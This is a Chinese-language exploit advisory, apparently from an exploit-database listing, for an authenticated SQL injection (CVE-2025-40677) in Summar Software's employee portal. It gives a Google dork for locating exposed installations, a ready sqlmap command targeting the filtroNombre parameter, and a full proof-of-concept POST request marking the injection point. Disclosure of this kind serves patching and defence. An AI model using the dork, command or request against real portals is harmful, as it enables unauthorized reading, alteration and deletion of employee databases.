Summar Employee Portal 3.98.0 认证SQL注入
发布日期: 2025年12月17日
提交者: Peter Gabaldon
风险等级: 中等
本地利用: 否
远程利用: 是
CVE编号: CVE-2025-40677
CWE编号: CWE-89
Google Dork: inurl:"/MemberPages/quienesquien.aspx"
漏洞信息
漏洞描述
Summar Software的“Portal del Empleado”(员工门户)存在一处SQL注入漏洞。该漏洞允许攻击者通过向/MemberPages/quienesquien.aspx页面发送POST请求,并在参数ctl00$ContentPlaceHolder1$filtroNombre中注入恶意载荷,从而对后端数据库执行检索、创建、更新和删除操作。
利用方法
可使用sqlmap工具进行自动化测试,命令如下:
1
|
sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"
|
PoC 请求示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [已隐藏]
Cookie: [已隐藏]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL注入点]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
|
注意: 上述请求中的 [SQL注入点] 为可被恶意SQL代码替换的参数值位置。